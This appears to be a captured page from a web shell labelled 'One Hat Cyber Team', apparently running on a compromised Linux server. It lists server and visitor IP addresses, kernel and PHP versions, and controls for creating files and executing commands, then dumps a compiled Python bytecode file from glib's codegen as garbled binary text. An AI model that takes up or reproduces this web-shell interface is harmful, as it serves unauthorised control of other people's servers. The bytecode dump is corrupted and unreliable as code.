⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.74
Server IP:
104.21.80.1
Server:
Linux vmi2315822.contaboserver.net 5.15.0-134-generic #145-Ubuntu SMP Wed Feb 12 20:08:39 UTC 2025 x86_64
Server Software:
LiteSpeed
PHP Version:
8.3.21
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
glib-2.0
/
codegen
/
__pycache__
/
View File Name :
parser.cpython-310.pyc
o �*c�2 � @ s: d dl ZddlmZ ddlmZ G dd� d�Zdd� ZdS ) � N� )� dbustypes)�print_errorc @ sj e Zd ZdZdZdZdZdZdZdZ dZ d Zddd�Zd Z dZdZdZdd� Zdd� Zdd� Zdd� ZdS )� DBusXMLParser�top�node� interface�method�signal�property�arg� annotation�ignoredTc C sx t jj�� | _| j| j_| j| j_| j | j_ | j| j_g | _ d | _tj| _g | _d | _g | _d| _|| _| j�|� d S )N� )�xml�parsers�expat�ParserCreate�_parser�handle_comment�CommentHandler�handle_char_data�CharacterDataHandler�handle_start_element�StartElementHandler�handle_end_element�EndElementHandler�parsed_interfaces�_cur_objectr � STATE_TOP�state�state_stack�_cur_object_stack�doc_comment_last_symbol�_h_type_implies_unix_fd�Parse)�self�xml_data�h_type_implies_unix_fd� r) �%/usr/share/glib-2.0/codegen/parser.py�__init__'